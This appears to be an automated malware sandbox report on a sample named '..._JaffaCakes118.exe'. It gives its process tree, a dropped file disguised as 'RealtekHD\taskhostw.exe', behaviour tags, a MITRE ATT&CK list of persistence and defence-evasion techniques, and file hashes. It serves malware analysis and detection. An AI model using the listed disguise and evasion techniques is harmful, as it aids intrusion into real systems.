C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4376
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:2756
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:3324
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:4012
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2792 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff88c159758,0x7ff88c159768,0x7ff88c1597782⤵PID:2400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:22⤵PID:4200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:1256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:3708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2840 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:2764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2848 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:2360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4060 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4736 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:3424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:3400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3940 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:4040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5172 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:2576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:1580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5260 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:1956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5220 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:4204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5396 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:3564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5392 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:2108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5812 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:1504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5816 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:4172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6104 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:4388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6372 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:5504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6480 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:5764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6760 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:5440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4984 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:5528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3468 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:1292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6560 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:2812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=2208 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:2420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2216 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:5244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5816 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:5160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=1492 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:12⤵PID:2576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6956 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:3192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:82⤵PID:1912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3048 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:22⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:3156
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:5928
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:5944
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:2660
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:4876
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe" C:\Users\Admin\AppData\Local\Temp\Msd100m.dll1⤵
- Suspicious use of SetWindowsHookEx
PID:764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵PID:5860
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:4648
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:5020
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
4Hidden Files and Directories
3Hidden Users
1Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
7Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
212KB
MD532942d3c314bbdf1620cd88103041704
SHA130d0e5acd4cd2d564fc0238bbd6b2817429a1d21
SHA256a5db8a2bfa0de0450b68df20d485031b84ff1bc05870635614c1753668ea62a4
SHA51296a50e3ac5209ccf9e98a1489ee5e48c4b3643e5f29ecc0ad4a7ea5fe9d2db2c20969cd599b071833e5ecca6ce01b89416cd0a9555416aa475cc23a69f682c02
-
Filesize
478KB
MD54ef6e64af66845bcf9c1bd324e51517f
SHA18f56d5884dd44d875deee14654b081fc407490a7
SHA2565abc1e7138cd3f9ed1d61b6dd5d505c8898ae9cc7f49e0ee45b93be991f520c8
SHA512e353f29636a51c5d379aaccf8354e75eaf2a4b90648f63e8becf6a7d9379f3e51bcb7584453e7b3697586396a5e650c12197dcfd7c04e23a3e7bbe011ad1d87c
-
Filesize
828KB
MD55f431f5ee701e752911ac4b7b164374c
SHA142109caf54679e668b792404157dd3ce9dec86de
SHA2568dfda367599ca982201c273cebf8b7ae03ccdbdec269cf164e814b94b90d0f54
SHA5121af73a30b0e112b83ca1ea8bf3e822ccaa2bd6518be8e8f07f06a7441323efcd64168033d53989611f725e4f5f57ae10fc0ddc0e7a62dcae21110bc7edb34149
-
Filesize
1.1MB
MD592685bfb04ed955d8f963d626883a4d6
SHA11e1ffe518101b1b79e3d6a6654f40e4d8b1a348a
SHA256779ea638cecb0c1b584f159507695810c8af6c467586597207d23f8af5df1919
SHA512d9b24a3f53bb10841727663ab939928eb6e1bd1e1387c6007c314bebe1c2a42d70c510f5b44955c8c6b463afc672cab7f8f9564c49509ec8486cbf6ff3d1cbfb
-
Filesize
289KB
MD507cfae028935e4a7b515f9e3ae226b74
SHA178d22c14b74f9e61c68d9ea5dc7fab999688dbab
SHA2568ccdad395811424fc6e6f1cb0d2e4365dc917ac1bd952de0f2c2ac4aa1e6b9f8
SHA5122d2e19b4b4377ab83a743958146d9f8922ea96e4b40d3fd6fd230d027d6025d07e8da2d743a8bc0d5691557540fb3f62372485615d1d0968ada5559106d86de3
-
Filesize
845KB
MD570ad47ac024936a6bccfd95567c1edfa
SHA1e1bbe7726bf970c08c2125a54c78fd479e6995ed
SHA25656a363311361e03dc395d274de67c2a64068df6b163389be80c7b6736ad0c5da
SHA5127929024c6af401066a9afc23d4da42b906f293935bc1628aa0fe901fba46ae979de4cb7818a1bfae9532d9a810987fe5209dadb508d42e0495f294f4b10651b4
-
Filesize
4.6MB
MD5d2a13f45e422348e79683468f2d72f48
SHA1a4a5fd1e42499123f6fc7a6995a88707efbec8a8
SHA2569ed880c9e5219168275ea143b4e2e526ff765f4e5c7c7b43224cb8f5cbbbc9aa
SHA5126ecd9cb874f724aea6d63dfa031dd28c3ccd0c07c31088b57701902cd397e04e7dc97b4bbde515e80c043840a71728b899b3729bfb5dc001c4166c3442154513
-
Filesize
244KB
MD54b2dbc48d42245ef50b975a7831e071c
SHA13aab9b62004f14171d1f018cf74d2a804d74ef80
SHA25654eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724
SHA512f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd
-
Filesize
346KB
MD5622610a2cc797a4a41f5b212aa98bde0
SHA1bfe47dce0d55df24aa5b6d59c442cf85c618176e
SHA2567f11dabe46bf0af8973ce849194a587bd0ba1452e165faf028983f85b2b624c2
SHA5123c6d36666086ffe13a09e4decc4956b0b15888de0ae457dabe29ed7e1195ec145cd1adc61e48fd7dc6eb8f0c94b69d5e2fb04bf75d9e456be0ca11289516381b
-
Filesize
382KB
MD5b78c384bff4c80a590f048050621fe87
SHA1f006f71b0228b99917746001bc201dbfd9603c38
SHA2568215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b
SHA512479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab
-
Filesize
3KB
MD55a68a20c96dd57a7f77a3b18297497cc
SHA110028871e272e13b182a059fc7c28ca451add98b
SHA2562aa27ef357ac867dd8ebe20918a5b9dd37ada178486c3a7a36e0a21c2156db5e
SHA51270c4a82a23924696421dc8a621fc284c55671ea32a6207664e4ad26127668314491a3cd12aac783d4ccb9b9832fd355eed5a795aafe5b49cd89d233b64eeabb5
-
Filesize
30KB
MD50bd6e68f3ea0dd62cd86283d86895381
SHA1e207de5c580279ad40c89bf6f2c2d47c77efd626
SHA256a18b0a31c87475be5d4dc8ab693224e24ae79f2845d788a657555cb30c59078b
SHA51226504d31027ceac1c6b1e3f945e447c7beb83ff9b8db29d23e1d2321fc96419686773009da95ef6cd35245788f81e546f50f829d71c39e07e07e1fecbf2d8fd4
-
Filesize
1.5MB
MD5b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
23KB
MD5487497f0faaccbf26056d9470eb3eced
SHA1e1be3341f60cfed1521a2cabc5d04c1feae61707
SHA2569a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5
SHA5123c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd
-
Filesize
593B
MD56d744b6b4f26582054765190f2a48fc4
SHA1f8389be05be2dcbe7b805048d47366da34e654bb
SHA2565cec12c6eb8148a88120e020c5a8ec694e1d2b00d88965cb77ce85c936012b7a
SHA51295dbf7a2845dfc307ac208c65baff017f65663f0ff8e4ce27100f2ab7c2fdb5a008148eb5f80a25eb2e91f117817a71e1a947114163b75c3948a33cc00135abc
-
Filesize
364B
MD585065fd092773b2e0e440c1f43e37fb2
SHA131da5755686589bb88c4e31936788da118c1d972
SHA256f4b69615a6ba607e1ffece1a327512505e827674d322a430df98c0130d1c7be1
SHA51274af37f2b2d31e59fa55af3cac120ca3f42e250862ae2b90445fdc19b3141607f11071cf084e9b799a40bf48f57e90a7cce865b81d2a5e2ec2dfc6e4508f8eb8
-
Filesize
194B
MD5e4d54fbfd7517dc5ca4297a811af79a7
SHA1fc1bbcdfaa699340ac02a1fec087c2102d612d81
SHA2569abd59853172258f9eaf360933c13c27bd855e4c7b37840a8f75ea51b0826f3c
SHA512a5c678becf3c38fcf92dc93506bd252596c346a75a939436b8f2087ab3b5b3b72a577c668e11ff71078276f15ead06676dc6ed3f6d1e0c6df35a896c13989878
-
Filesize
140B
MD55e36713ab310d29f2bdd1c93f2f0cad2
SHA17e768cca6bce132e4e9132e8a00a1786e6351178
SHA256cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA5128e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1
-
Filesize
13KB
MD50a9de68d3dc8e3191ba1f6f7c9f195b3
SHA1fabdedf2bc4a2417ac04048e5e736243838f40bd
SHA256d4919ef008472afe0d896f71be43ceeb1a6fe16da5f9c5ce82bda5c454c5fd1f
SHA51222664679f30beef86bf7f4108f7965251dfdf05c56dc30b031d3cbd7b49935f37df5d32ea3aba921a6d2ca64ae7ac9ceca540efd28cece1d0b91524018e25c65
-
Filesize
155KB
MD588318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
Filesize
593KB
MD56298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
Filesize
1.1MB
MD50ad9af59a50ebe8e71794c8d6d5b202f
SHA189a63d35581171ba9dff6451295988ff6d108ae9
SHA2565ce115d29377c45b23db067b3f5e77f46e96686b48e7ee4a5ad6e8d52ee5bf0e
SHA512a69be9e2a5c153dd0cc0783ff24de6a07a02758239979b411d397b7527c676ae9751b92978686999dff00d9c36d1bfbf5f3e9358a98fa6d375876e8a402d339a
-
Filesize
51KB
MD5ac7d38595509d2daf9a67442d51804de
SHA168b16b7d8aaf27b7d94239a2d0dd092e860c7c87
SHA2569a9cb86a52068e748954454f1adb05015af44075a75743623e0c97b01783ae5f
SHA5126cda6e5c8501eaa9424f1c9bdbcfec85725fb8de6473454852497f4c97082a729c90ca51d8746fc445a99092a5fb4714e5de4cada8e5b78bf5201eb2e8df3688
-
Filesize
103KB
MD5035180be4cc4c52390ab8b5596662898
SHA12872ad7def1cc6b17ed52975e664ffd060aa48bc
SHA2562352daa6450558472b0fba50e5f1619a1b688a195f70578cb2e28120caa37981
SHA512c2c829808071edd40f5e82e6e023b50a17cf47ce06cc4e0c6b35d998964cb5dc552a668841dafd79c758aadc128095205dc4801615e1d9a12b339b4a2e8a0892
-
Filesize
32KB
MD5057b37cd68b1f02e1cb8150b00f54c9d
SHA1829de87cdea0b8f3a877292eb451c2f2430dcd98
SHA256c8da3c4bf014cba89ad4beb4cafce17a933f71358f1df0454df8f1302fb48f9b
SHA512f2133d8dc6eb4e386f6517ebb21b7fcebdf7d2f5d2a2fbbe4b021002dfce50b826852164f903dc3533107f25ec4c26ec087abcd4b3fe41dd62551e5571b87520
-
Filesize
145KB
MD55683ae67206fba65c28d03862894f3c8
SHA1ff806385ff84415d6928f3cf82cb1fa49951d9c8
SHA25688d1a59789b2e017c8725f362c289dd46e9c40eded9e74df2d9b3def0a821598
SHA51225b071ae288844c548183fa57a274af1ee93d1ef1203a02386499a057a93bbc81d113eb1ba61fdd856eb5ae4bc08b282b7e36cd9bd54a5ea7dfa1f1bbad8cc00
-
Filesize
19KB
MD5ce1093c800c0933d7c9674eda75790d8
SHA1371c2dcde092f51b18852e2617bc6c0c176f5873
SHA25657781a723db9a2483067bcbc89d1f30f7e2f22ae2d18aab1e45ad894d8cdab89
